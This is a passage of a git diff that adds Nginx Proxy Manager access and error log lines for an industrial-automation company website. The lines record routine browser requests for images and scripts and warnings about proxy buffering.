https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.59] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:21:42:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.41] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:21:42:51 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:50:58 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 121.139.173.148] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.google.com/" +[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 121.139.173.148] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 121.139.173.148] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 121.139.173.148] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 121.139.173.148] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 121.139.173.148] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 121.139.173.148] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 121.139.173.148] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 121.139.173.148] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 121.139.173.148] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 121.139.173.148] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 121.139.173.148] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 121.139.173.148] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 121.139.173.148] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:59:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 121.139.173.148] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:01:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.41] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.google.com/" +[18/Feb/2026:22:02:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 211.234.204.1] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 211.234.204.1] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 211.234.204.1] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:02:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 211.234.204.1] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:22:48:06 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[18/Feb/2026:22:48:42 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:22:48:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 211.234.204.1] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" diff --git a/npm/data/logs/proxy-host-1_error.log b/npm/data/logs/proxy-host-1_error.log index b38a936..70dc68d 100644 --- a/npm/data/logs/proxy-host-1_error.log +++ b/npm/data/logs/proxy-host-1_error.log @@ -407,3 +407,244 @@ 2026/02/17 02:31:20 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/01/0000011016 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/17 02:31:20 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/01/0000011017 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/17 02:31:21 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/01/0000011018 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/02/0000011028 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/02/0000011029 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/03/0000011030 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/03/0000011031 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:45:25 [warn] 900#900: *40468 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/03/0000011032 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:45:25 [warn] 900#900: *40468 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/03/0000011033 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:57:08 [warn] 901#901: *40550 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/03/0000011034 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/03/0000011035 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/03/0000011036 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/03/0000011037 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:03:45 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/03/0000011038 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:03:45 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/03/0000011039 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:03:46 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/04/0000011040 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/04/0000011041 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/04/0000011042 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/04/0000011043 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:15:43 [warn] 901#901: 